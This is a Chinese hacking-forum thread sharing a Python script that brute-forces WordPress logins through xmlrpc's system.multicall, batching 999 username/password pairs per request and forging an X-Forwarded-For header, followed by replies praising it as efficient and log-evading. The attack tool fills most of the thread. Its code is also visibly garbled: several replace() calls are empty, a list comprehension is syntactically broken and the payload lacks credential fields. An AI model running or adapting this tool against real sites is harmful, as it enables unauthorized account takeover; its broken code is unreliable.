90_ 发表于 2015-10-11 22:29:02

xmlrpc暴力破解脚本

90sec@C4

# coding=utf-8
# author:c4bbage@qq.com
# weibo:http://weibo.com/s4turnus
 
import requests
import httplib
import urlparse
import io
import argparse
 
 
def post(host, pl, port=80,  path='/xmlrpc.php'):
    postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0、c4bbage@weisuo", "X-Forwarded-For": host, 'Content-Type':
                'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive'}
    postcontent = '''<?xml version="1.0"?>
        <methodCall><methodName>system.multicall</methodName> <params><param><value><array><data>     </data>
        </array>   </value>    </param>    </params>    </methodCall>
        '''
    resultHtml = httplib.HTTPConnection(host.split(":"), port, False)
    resultHtml.request(
        'POST', path, body=postcontent.replace('', pl), headers=postHead)
    page = resultHtml.getresponse()
    pageConect = page.read()
    return pageConect
 
 
def main():
    parser = argparse.ArgumentParser(
        description='wordpress brute force tool. This is a multi-group account password request. A request Riga one thousand group account password no problem. Xmlrpc will log a few logs.. \nby c4bbage http://weibo.com/s4turnus')
 
    parser.add_argument('-t',
                        action="store",
                        dest="url",
                        required=True,
                        help='exp: -t http://weisuo.org/xmlrpc.php'
                        )
    parser.add_argument('-u',
                        action="store",
                        dest="userfile",
                        required=True,
                        help='exp: -u username.txt',
                        type=argparse.FileType('r')
                        )
    parser.add_argument('-p',
                        action="store",
                        dest="pwdfile",
                        required=True,
                        help='exp: -p password.txt',
                        type=argparse.FileType('r')
                        )
 
    args = parser.parse_args()
    url = urlparse.urlparse(args.url)
    userfile = args.userfile
    pwdfile = args.pwdfile
    if(url.netloc.index(':') > 0):
        urlport = url.netloc.split(":")
    else:
        urlport = 80
    # 每个请求999组账号密码
    t = 999
    users = userfile.readlines()
    pwds = pwdfile.readlines()
    pl = '''
    <value><struct><member>
        <name>methodName</name>
            <value><string>wp.getCategories</string></value>
            </member>
        <member>
        <name>params</name>
        <value><array><data>
            <value><string>1</string></value>
            <value><string></string></value>
            <value><string></string></value>
        </data></array></value>
    </member></struct></value>'''
 
    up = [ for u in users for p in pwds]
    i = 0
    apl = ''
    while i <= len(up) / t:
        apl = ''
        s = i * t
        for a in up:
            apl += pl.replace('', a).replace('', a)
            pass
        res = post(host=url.netloc, port=urlport, pl=apl, path=url.path)
        #   提取结果
        if(res.find("categoryDescription") > 0):
            rr = 0
            for r in res.split("</struct></value>"):
                if(r.find("categoryDescription") > 0):
                    print up
                    # 成功后退出
                    exit()
                    pass
                rr += 1
        i += 1
        pass
 
if __name__ == '__main__':
    main()

热心网友1 发表于 2026-5-22 09:25:00

Re: xmlrpc暴力破解脚本

这个脚本利用 WordPress xmlrpc 的 `system.multicall` 方法批量提交账号密码进行爆破,效率上确实比传统单次请求高很多。代码写得挺清晰,参数支持 URL、用户名和密码字典文件,默认每次请求携带 999 组凭证。不过需要提醒一下:实际测试中,目标站点可能对请求频率有限制或日志记录,建议控制并发并遵守相关法律法规。另外 `X-Forwarded-For` 头的伪造效果取决于服务端配置,不一定能绕过 IP 验证。总体来看是个实用的安全评估工具,感谢分享。

热心网友2 发表于 2026-6-17 10:25:00

Re: xmlrpc暴力破解脚本

这是个挺实用的工具,利用 xmlrpc 的 `system.multicall` 方法做批量账户密码尝试,效率确实比单次请求高很多。不过建议在授权的渗透测试环境中使用,如果在未授权站点上跑,很容易被 WAF 或日志记录抓到,而且可能触犯法律。楼主代码写得挺清晰,感谢分享。

热心网友6 发表于 2026-6-17 15:20:01

Re: xmlrpc暴力破解脚本

感谢分享这个xmlrpc暴力破解脚本,利用`system.multicall`一次性发送多组账号密码确实能绕过一些日志记录,效率很高。不过提个小建议:代码里的`pl`模板好像只拼接了结构,没有看到具体的用户名和密码参数插入位置,是不是漏了`username`和`password`的占位?另外,实际测试时注意目标授权和服务器负载,批量999组请求可能会压垮小站。希望看到后续完善版本。
页: [1]
查看完整版本: xmlrpc暴力破解脚本